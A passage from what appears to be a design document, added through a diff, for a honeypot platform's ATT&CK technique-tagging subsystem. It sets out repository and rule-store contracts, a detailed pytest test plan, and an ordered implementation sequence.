lists, + `{}` for the Navigator JSON envelope). +- Pydantic response models declared in `decnet/web/db/models/ttp.py` + alongside the SQLModel (per the "all models in one place" project + rule — the package surface, not the literal file). +- Routers registered in `decnet/web/router/__init__.py`. + +**E.1.10 — Repository contract** (`decnet/web/db/sqlmodel_repo/ttp.py`) + +- `async def insert_tags(rows: list[TTPTag]) -> int` — bulk upsert + with `INSERT OR IGNORE` semantics for idempotency. +- `async def list_techniques_by_identity(uuid: str) -> list[...]`. +- `async def list_techniques_by_attacker(uuid: str) -> list[...]`. +- `async def list_techniques_by_campaign(uuid: str) -> list[...]`. +- `async def list_techniques_by_session(sid: str) -> list[...]`. +- `async def list_distinct_techniques() -> list[...]`. +- All return empty lists at contract phase. + +**E.1.11 — RuleStore contract** +(`decnet/ttp/store/{base.py, factory.py, impl/}`) + +- `class RuleState` frozen dataclass: state literal + ("enabled" | "disabled" | "clipped"), `confidence_max`, + `expires_at`, `reason`, `set_by`, `set_at`. Default constructor + yields `state="enabled"` with all other fields `None`. +- `class RuleChange(NamedTuple)`: change_kind + ("definition" | "state"), rule_id, new_value (CompiledRule or + RuleState). +- `class RuleStore(ABC)`: + - `async def load_compiled(self) -> list[CompiledRule]`. + - `async def get_state(self, rule_id: str) -> RuleState`. + - `async def set_state(self, rule_id: str, state: RuleState, + set_by: str) -> None`. + - `async def subscribe_changes(self) -> AsyncIterator[RuleChange]`. +- `decnet/ttp/store/factory.py` — `get_rule_store() -> RuleStore` + reads `DECNET_TTP_RULE_STORE_TYPE`. Default `"filesystem"`. + `_KNOWN: tuple[str, ...] = ("filesystem", "database")`. +- `FilesystemRuleStore` empty body. Will read `./rules/ttp/`, + inotify-watch, hold state in-process dict. **Filename filter + (allowlist, not denylist)**: a path is accepted iff its basename + fully matches `re.fullmatch(r"[A-Za-z0-9_]+\.ya?ml", basename)`. + Anything else — vim swap (`.foo.yaml.swp`), atomic-save probes + (`4913`), backups (`foo.yaml~`, `.foo.yaml.bak`), random tempfile + conventions a future editor invents — is silently ignored, no + parse, no log line. Denylists rot the moment an editor changes + its scratch convention; the allowlist stops being clever. + Applies identically to the initial `load_compiled()` walk and + the inotify event handler. +- **Inotify event mask** (`FilesystemRuleStore`): + `IN_MOVED_TO | IN_CREATE | IN_CLOSE_WRITE | IN_DELETE`. + Rationale, verified against an actual `strace` of vim: + - **`IN_CLOSE_WRITE`** — vim writes in place via plain + `write(fd, …)` to the target file and closes; the kernel + fires `IN_CLOSE_WRITE` on the path. This is the dominant + save signal for vim and most editors that keep an open file + descriptor. + - **`IN_MOVED_TO`** — editors with atomic-write modes + (gedit, some IDEs, vim with `:set backupcopy=no` plus a + rename strategy, `mv foo.yaml.tmp foo.yaml` from a + deploy script) write a tempfile then `rename()` it onto + the target. The kernel fires `IN_MOVED_TO` on the target. + - **`IN_CREATE`** — brand-new rule file appears (`touch`, + `cp`). + - **`IN_DELETE`** — rule removed; engine drops the + compiled rule from its dispatch index and emits a + `ttp.rule.reloaded.{rule_id}` event with the rule absent + from the new state. + + Filenames that pass the filter and trigger ANY of these events + go through the same compile + atomic-swap path. Filenames that + fail the filter trigger neither parse nor log line, per the + scratch-file rule above. +- `DatabaseRuleStore` empty body. Will mirror rule content into + `ttp_rule` table, state in `ttp_rule_state`. Two new SQLModels + shipped in this contract step (alongside `TTPTag` from E.1.1): + - `class TTPRule(SQLModel, table=True)`: rule_id PK, + rule_version, source_path, yaml_content, updated_at, + **updated_by** (operator who pushed the edit; for filesystem + store always "filesystem" / "git"; for DB store the admin + JWT subject). + - `class TTPRuleState(SQLModel, table=True)`: rule_id PK, + state, confidence_max, expires_at, reason, set_by, set_at. +- New bus topic constants for `ttp.rule.reloaded` and + `ttp.rule.state` declared in this commit. + +### E.2 Tests + +The test phase locks in the *behavior contract*. Tests pass against +the empty-body implementations only where the empty value is the +correct answer (e.g. "list_techniques_by_identity returns empty +list for an unknown identity"). Tests that pin behavior beyond the +trivial empty case must be marked +`@pytest.mark.xfail(strict=True, reason="impl phase E.3.")` +in the contract commit so the suite is GREEN, not red, between +contract and implementation. + +This is non-negotiable per the project's "every per-task commit +must include passing tests" rule. A 17-commit window of red CI +trains the team to ignore red CI; CDD discipline does not require +that. The `strict=True` flag turns an accidental early +`xpass` (the test starts passing because the impl landed early) +into a failure, so the marker is itself the trip-wire that says +"this test is now load-bearing — flip the marker." + +The marker is removed in the same commit as the implementation +step that makes the test pass (E.3.N). The "tests in the same +commit as code" project rule applies to that flip: the impl and +the marker-removal land together, never separately. + +Tests ship in this order, one commit per step. Coverage targets in +`tests/ttp/` mirroring source layout. The "GREEN at contract +time / xfail-flip at impl time" discipline above applies to +**every** test in this section. + +**E.2.1 — Schema invariant tests** (`tests/ttp/test_schema.py`) + +- `attacker_uuid OR identity_uuid` CHECK constraint rejects rows + with both null. Use a real engine (sqlite in-memory) — no mocks. +- App-layer guard: `TTPTag(attacker_uuid=None, identity_uuid=None, + ...)` raises **exactly `ValueError`** (not a Pydantic + `ValidationError`, not a bare `Exception`) and the exception + message contains BOTH the literal substrings `"attacker_uuid"` + AND `"identity_uuid"`. Asserting both in the message pins the + semantics so a future contributor cannot "simplify" the guard + into a generic `assert` or a Pydantic field-validator without + the test catching it. Covers MySQL <8.0.16 where the CHECK is + silently ignored. +- The guard runs BEFORE `super().__init__()`. Test that + reordering it to fire after Pydantic validation breaks the + contract: introspect the `__init__` source via `inspect` and + assert the guard's `raise` appears at a lower line number than + the `super().__init__` call. +- `confidence` outside [0.0, 1.0] is rejected at insert. +- `INSERT OR IGNORE` on duplicate `uuid` is a no-op (no exception, + no duplicate row). +- `uuid` column accepts a real RFC-4122 UUID string (regex + `^[0-9a-f]{8}-[0-9a-f]{4}-5[0-9a-f]{3}-[0-9a-f]{4}-[0-9a-f]{12}$` + for UUIDv5) — pins the "this is a UUID, not a SHA-256 stub" + property at the column level. +- `evidence` round-trips as a Python dict (insert dict, read dict) + — confirms the JSON column type wiring works on the dialect + under test. Per dual-DB-backend convention this runs on both + SQLite and MySQL via the existing `db_backends` fixture. + +**E.2.1b — Evidence shape contract** (`tests/ttp/test_evidence_shape.py`) + +- For each lifter, parametrize over a synthetic event matched by + one of its rules. Assert the `evidence` dict on the emitted tag + is structurally compatible with the corresponding `TypedDict` + for that `source_kind` (`CommandEvidence`, `IntelEvidence`, + `EmailEvidence`, `CanaryFingerprintEvidence`, …). Use + `typing.get_type_hints()` on the TypedDict and assert keys + types + match. +- Negative test: a lifter that emits an evidence dict containing a + key not present in the TypedDict raises a `TypeError` at the + `TolerantTagger` boundary — the shape mismatch is loud, not + silent. (`TolerantTagger` swallows other exceptions per the + "absence is normal" rule, but evidence-shape violations are + programmer errors and propagate.) +- PII rule §6 enforced as a type property: `EmailEvidence` has no + field accommodating raw rcpt addresses or body bytes. The test + asserts `"rcpt_to_list"` and `"body"` are NOT keys of + `EmailEvidence.__required_keys__ | EmailEvidence.__optional_keys__`. + +**E.2.2 — Idempotency + replay-safety property tests** (`tests/ttp/test_idempotency.py`) + +- Hypothesis property: for any valid input tuple, `compute_tag_uuid` + returns the same string twice in a row. Determinism. +- Distinct input tuples produce distinct UUIDs (collision resistance + within the practical input space — sample N=10000). +- UUID is stable across Python versions (golden-value fixture: a + pinned input → pinned hash. Drift = breaking change). +- **Replay-safety lock.** Inputs accepted by the hash function + are EXACTLY `(source_kind, source_id, rule_id, rule_version, + technique_id, sub_technique_id)`. The test introspects the + function signature (or AST) and asserts the parameter set + matches this list exactly. **A future contributor adding + `created_at`, `os.getpid()`, `random.random()`, or any other + non-deterministic input must update this test deliberately — + silently breaking replay safety becomes impossible.** + +**E.2.3 — Bus topic naming tests** (`tests/bus/test_ttp_topics.py`) + +- All TTP_* constants match the documented names exactly. +- `matches("ttp.>", TTP_TAGGED)` is True (subscription wildcards + work as documented). +- `EMAIL_RECEIVED` is one NATS token (no embedded dots that would + break the bus validator). + +**E.2.4 — Tagger ABC conformance** (`tests/ttp/test_base.py`) + +- A subclass that doesn't override `tag()` cannot be instantiated. +- `TolerantTagger.tag()` swallows `Exception` from the underlying + `_tag_impl()` and returns `[]`. Hypothesis fuzz with raised + exceptions of arbitrary types (incl. `BaseException` subclasses + that should NOT be swallowed: `KeyboardInterrupt`, `SystemExit`, + `asyncio.CancelledError` — those propagate). +- Logged warnings on swallowed exceptions are at `WARNING` level + not `ERROR` (per "absence is normal, not noise"). + +**E.2.5 — RuleEngine behavior** (`tests/ttp/test_rule_engine.py`) + +- Empty rules directory compiles to an empty list (the worker can + start with no rules). +- A malformed YAML file raises at `compile()`, NOT at `evaluate()` + (deploy-time failure, not runtime). +- `evaluate()` against an event whose `source_kind` is unknown to + every rule returns `[]`. +- A rule with multiple `emits` produces multiple tags from a + single match (the "one event maps to many techniques" property + enforced at engine level). +- `rule_version` mismatch between two rules emitting the same + technique on the same event produces two distinct tag UUIDs (per + the worked example in the schema section). + +**E.2.6 — "Tolerates absence" per-lifter** (`tests/ttp/test_lifter_absence.py`) + +- For each lifter (behavioral, intel, email, canary_fingerprint, + identity, credential): given an event whose required join is + empty (no `AttackerIntel` row, no `SessionProfile` row, no + `AttackerBehavior` row, etc.), the lifter returns `[]` and logs + no error. +- For the intel_lifter specifically: parametrize over per-provider + null patterns (only GreyNoise null, only AbuseIPDB null, all + null, all populated) — confirm each produces the expected + partial tag list with no errors. + +**E.2.7 — Static decoupling lint** (`tests/ttp/test_decoupling.py`) + +- Walk every module under `decnet/ttp/` (AST-parse, no runtime + import). Assert no module imports from `decnet.intel.{abuseipdb, + greynoise, feodo, threatfox}` — only `decnet.web.db.models` is + permitted for intel-related symbols. This is the no-SPOF + decoupling rule §2 enforced statically. +- Same lint for biometrics: no `decnet.profiler.keystroke.*` (or + whatever the future ingester namespace becomes) imports under + `decnet/ttp/`. + +**E.2.8 — API shape + auth tests** (`tests/web/router/ttp/test_*.py`) + +- Each endpoint returns `200` with the documented response shape + for a known-empty store. +- Each `GET` endpoint returns `401` without a JWT. +- **Admin-only mutation endpoints** + (`POST /api/v1/ttp/rules/{rule_id}/state`, + `DELETE /api/v1/ttp/rules/{rule_id}/state`): + - Without JWT → `401`. + - Non-admin JWT → `403`. + - Admin JWT → `200` (or `204` for DELETE). + - Server-side enforcement: the test must inject a JWT with + `role="user"` and assert the server rejects, NOT a + client-side feature flag. Per the project's "no client-side + role checks" rule. +- Schemathesis property test: every documented `4xx` response is + reachable with the right input. Per the "POST/PUT/PATCH 400 + documented" project convention, the `POST /rules/{rule_id}/state` + body-validation 400 is documented and tested. +- Response model JSON schema is stable (golden fixture at + `tests/web/router/ttp/schemas/`). + +**E.2.9 — UKC bridge bijection tests** (`tests/clustering/test_ukc_bridge.py`) + +- Every tactic key in `ATTACK_TACTIC_TO_UKC` is a valid + TA-prefixed string. +- Every value is a member of `UKCPhase`. +- For every `UKCPhase` in `OBSERVABLE_PHASES`, the inverse function + returns a tactic that maps back to the same phase. +- Phases NOT in `OBSERVABLE_PHASES` (RECONNAISSANCE pre-target, + RESOURCE_DEVELOPMENT, etc.) may have lossy inverse — that's + documented; the test pins which ones are lossy so a future + contributor doesn't "fix" it accidentally. + +**E.2.10 — Confidence model tests** (`tests/ttp/test_confidence.py`) + +- `confidence × multiplier` never raises the value above the rule's + base (downward-only adjustment property). +- A computed confidence below 0.3 is dropped — `insert_tags()` + receives the row but writes nothing, returns the dropped count. +- Provider-score factor: `intel_lifter` with AbuseIPDB score 30 + produces `0.85 × 0.30 = 0.255` → dropped, no row written. + +**E.2.11 — Multi-mapping property tests** (`tests/ttp/test_multi_mapping.py`) + +- Hypothesis: given a synthetic event matched by N rules each + emitting M techniques, the engine produces exactly N×M tag rows + (with idempotent UUIDs so a re-run produces zero new rows). +- One rule emitting two techniques produces two distinct tag UUIDs + (worked example pinned as a fixture). + +**E.2.12 — Bus integration** (`tests/ttp/test_worker_bus.py`) + +- Subscribed topics from `_TOPICS` constant match the documented + set exactly. +- Worker started against an in-memory bus and given a faked + `attacker.session.ended` event invokes the rule engine. +- `attacker.enriched` arriving for a session that already had tags + written produces *additional* tags from intel_lifter without + duplicating the rule-engine tags (idempotency across re-firings). +- No subscription on a topic NOT in `_TOPICS` (catches accidental + string-literal subscriptions that drift from the constants). +- **Loop-prevention invariant** (canonical statement in "Bus + topics" above; this test enforces it). Concretely: invoke the + worker on the same source event twice; assert exactly one + `ttp.tagged` event was published (not two), and that re-runs + N=10× still produce only the original event. +- **Bus delivery requirements** (per the "Bus delivery + requirements" section): a test fake bus configured to drop + `attacker.enriched` events still produces intel-derived tags + via the `attacker.session.ended` catch-up path. The same fake + configured to drop `email.received` produces NO email tags + (no catch-up exists for email; the test pins this asymmetry + rather than papering over it). + +**E.2.13 — Repository tests** (`tests/web/db/test_ttp_repo.py`) + +- Per dual-DB-backend project convention: every repo test runs + against both SQLite and MySQL. Use the existing `db_backends` + parametrize fixture. +- `insert_tags` is idempotent across runs. +- `list_techniques_by_identity` projects through `Attacker.identity_id` + correctly when `attacker_uuid` is set on the tag. +- `list_techniques_by_identity` returns `identity_rollup` tags with + null `attacker_uuid` correctly. + +**E.2.14a — Observability** (`tests/ttp/test_tracing.py`) + +OTEL spans are not optional decoration; they're a stated design +property. Tests pin the span hierarchy: + +- A single `evaluate()` call produces a `ttp.eval` span with + `attacker_uuid` and `identity_uuid` attributes. +- Within `ttp.eval`, one `ttp.lifter.{name}` child span per + lifter that ran (use the in-memory OTEL test exporter). +- Within each lifter span, one `ttp.rule.fire` span per matched + rule, with `rule_id` and `technique_id` attributes. +- A `set_state()` API call produces the `ttp.rule.state.change` + parent + `ttp.store.write_state` + `ttp.rule.publish` children. +- **No-PII property**. Walk every span attribute produced during + a battery of synthetic events containing tagged "PII canary + strings" (e.g. body text "CANARY_PII_DO_NOT_LEAK"). Assert no + attribute value contains any canary string. Catches accidental + attribute writes of raw command content / email body / payload + bytes / fingerprint blobs. + +**E.2.14b — RuleStore conformance** (`tests/ttp/store/test_*.py`) + +The crucial property: both backends satisfy the **same** ABC +contract observably. Tests are parametrized over +`(FilesystemRuleStore, DatabaseRuleStore)` and assert identical +behavior: + +- `load_compiled()` over a known YAML corpus returns the same + `CompiledRule` set from both backends (modulo `state` defaulting + to enabled when no state row exists). +- `get_state()` for an unknown rule_id returns the default + `RuleState(state="enabled", ...)`, not raising. +- `set_state()` on one rule_id does not affect the state of any + other rule. +- `set_state()` followed by `get_state()` round-trips faithfully. +- `subscribe_changes()` yields **one** `RuleChange` per per-rule + edit. A 5-rule edit produces 5 events, never a batch of 1 + carrying 5 entries (the "incremental, never batched" property + enforced by test). +- `expires_at` in the past on `get_state()` returns the default + `enabled` state and emits a `ttp.rule.state.{rule_id}` event + with the auto-revert. +- Filesystem-specific: editing a YAML file at projroot triggers + `subscribe_changes()` to yield within the inotify-watch debounce + window (~500ms). Use a tmp_path fixture; do not touch the real + `./rules/` during tests. +- Filesystem-specific: **inotify mask coverage**. Parametrize over + the four save-style cases and assert each yields exactly one + per-rule event: + - **In-place write** (`open(path, 'w').write(...)` then close) + — fires `IN_CLOSE_WRITE`. Models vim's default save (verified + by strace). + - **Atomic rename** (`open(tmp, 'w').write(...)` then + `os.rename(tmp, path)`) — fires `IN_MOVED_TO` on the target. + Models gedit, IDE saves, deploy scripts. + - **Touch-create** (`Path(new_path).touch()`) — fires + `IN_CREATE`. Models a brand new rule landing. + - **Delete** (`os.unlink(path)`) — fires `IN_DELETE`; the + affected rule_id is dropped from the dispatch index and a + `ttp.rule.reloaded.{rule_id}` event fires with the rule + absent. +- Filesystem-specific: **atomic-swap concurrency**. Spin up N + parallel asyncio tasks, each editing a distinct rule file. The + store must serialize compile work into a single ordered stream + (verified by an instrumented `RuleEngine` that records compile + start/end timestamps and asserts no two intervals overlap). + Concurrent `evaluate()` calls during the edit storm see only + fully-frozen `CompiledRule` values — never a torn intermediate. + Use `dataclasses.FrozenInstanceError` as the in-test smoke + signal: any attempt to mutate a `FrozenCompiledRule` field + raises, surfacing accidental in-place mutation immediately. +- Filesystem-specific: **dotfiles and editor scratch files are + ignored.** Parametrize over a corpus of "should be ignored" + filenames and assert each produces zero events from + `subscribe_changes()` and zero entries in `load_compiled()`: + - `.T1110_brute_force.yaml.swp` (vim swap) + - `.T1110_brute_force.yaml.swo` (secondary vim swap) + - `T1110_brute_force.yaml~` (backup tilde) + - `.T1110_brute_force.yaml.bak` (dot-prefix backup) + - `4913` (vim atomic-save probe artefact, no extension) + - `.4913` (dot-prefix variant) + - `.foo` (any dotfile, no yaml extension) + - `T1110_brute_force.yaml.tmp` (no dot but wrong extension) + - `T1110_brute_force.txt` (right shape, wrong extension) + + Then the positive case: a sibling file `T1110_brute_force.yaml` + in the same directory IS picked up — confirms the filter + excludes scratch files without false-rejecting the real one + next to them. + + Critical sub-property: an inotify CLOSE_WRITE event on a + filtered name produces neither a parse attempt (no + `RuleSchema.validate()` call) nor a log line. The filter is the + first thing the event handler checks; observability noise on + every vim save would be its own bug. +- Database-specific: per the dual-DB-backend convention, tests + run against both SQLite and MySQL via the `db_backends` + parametrize fixture. +- A failing `set_state()` (DB write error in the database backend) + raises rather than silently dropping — operational state changes + are NOT a tolerated-absence path. State drift would be silent + and dangerous. + +### E.3 Implementation + +Implementation steps each ship as a single commit, with tests from +phase E.2 transitioning from FAIL to PASS. The project's "tests in +the same commit as code" rule means each impl step ALSO touches +the relevant test file to enable the previously-skipped assertions +(if any were skipped pending impl). + +Order: + +1. **Schema** — fill `compute_tag_uuid()`. Run `pytest + tests/ttp/test_schema.py tests/ttp/test_idempotency.py`. Both + green. +2. **Bus constants + wiki** — already content-only at contract + phase; this step is just verifying naming tests are green + (including the new `ttp.rule.reloaded.*` and `ttp.rule.state.*` + per-rule topic format). +3. **Repository** — implement `insert_tags`, the listing methods. + `test_ttp_repo.py` green on both backends. +4. **API endpoints** — fill in handlers reading from repo. Empty + store still returns empty lists; `test_*.py` shape tests green. +5. **RuleStore — FilesystemRuleStore** — implement YAML parse, + Pydantic validation, inotify watch, in-process state cache, + `subscribe_changes()` async iterator yielding per-rule events. + Test bus-event fan-out under a 5-file edit produces exactly 5 + events. `test_*.py` for the filesystem backend green. +6. **RuleStore — DatabaseRuleStore** — implement DB-backed + variant. `ttp_rule` and `ttp_rule_state` tables created via + SQLModel. Master-side filesystem→DB sync. Worker-side DB + tail. Conformance tests green on both backends in parallel + (filesystem vs database) using the parametrized fixture. +7. **RuleEngine** — implement engine consuming from `RuleStore`. + Atomic per-rule swap on `RuleChange`. State applied + after-parsing via `RuleState` join. `test_rule_engine.py` + green. +8. **Rule pack v0** — write the YAML files for `R0001`–`R0058` + at `./rules/ttp/`. Each rule lands with its precision-target + test per Appendix C in the same commit. The corpus for + precision testing comes from a labelled holdout fixture under + `tests/ttp/rule_precision/corpus/` — that fixture is itself a + sub-step (commit) before any rule lands. +9. **BehavioralLifter** — read `AttackerBehavior` / + `Credential` / `CredentialReuse`, emit per Appendix A behavior + tables. Tests in `test_lifter_absence.py` and a new + `test_behavioral_lifter.py` green. +10. **IntelLifter** — read `AttackerIntel`, emit per Appendix A.10. + Per-provider null tolerance tests green. +11. **CanaryFingerprintLifter** — parse fingerprint payload, + evaluate against derivation rules per Appendix A.9. +12. **EmailLifter** — full SMTP message parser + header / body / + attachment evaluators per Appendix A.6. Largest single impl + step; consider splitting along header / body / attachment lines + if the diff balloons past ~600 lines. +13. **IdentityLifter + CredentialLifter** — cross-Attacker rollups. + Bus-wake on `identity.formed` / `identity.merged` / + `credential.reuse.detected`. +14. **Worker bootstrap** — wire up the loop, the + `CompositeTagger`, the bus subscriptions, the `RuleEngine` + watching the `RuleStore`. `test_worker_bus.py` green + end-to-end. +15. **UKC bridge** — implement `tactic_to_ukc_phase` and inverse. + Rewrite the campaign clusterer's + `IdentityFeatures.commands_by_phase_on_decky` adapter to read + from `ttp_tag`. Validate that production phase-handoff edge + weights now fire (previously dormant — the phase-handoff + test's `xfail` flips to `xpass`, which is the moment we know + this whole project paid off). +16. **Frontend** — `IdentityDetail` "TTPs Observed" section, + `AttackerDetail` per-IP slice, Navigator export buttons, + rule-state controls (disable / clip / TTL) backed by the + `set_state()` API. UI smoke tests via the existing dev-server + flow per project convention. +17. **Schemathesis pass** — full API fuzz including the new TTP + routes. Document any new 4xx codes per the project's + "POST/PUT/PATCH 400" convention. + +### E.4 Out-of-band tasks (not gated on the above) + +These can land in parallel without blocking the main path: + +- **Backfill CLI** — `decnet ttp backfill --since N days` walks + `attacker_command` / `email` / `canary_event` history and runs + the worker over each row. Shipped post-v0 worker-online. +- **Provider mapping review** — schedule a quarterly DEBT.md item + to re-walk AbuseIPDB / GreyNoise / ThreatFox catalogues for new + categories. +- **Sigma adapter** — separate engine; lands when v0 ships and the + precision targets are stable. + +### E.5 Stop conditions + +The CDD plan declares the design phase complete when: + +1. Every contract file from §E.1 exists and compiles. +2. Every test from §E.2 exists, runs, and produces a deterministic + PASS or FAIL (no flakes). +3. The test suite communicates the *intended behavior* clearly + enough that a stranger reading only `tests/ttp/` could + reconstruct the design from the assertions. + +If condition 3 fails — if a future contributor reads the tests +and is confused about what the system is supposed to do — that is +a doc bug, not a test bug, and TTP_TAGGING.md gets the update, +not the test file.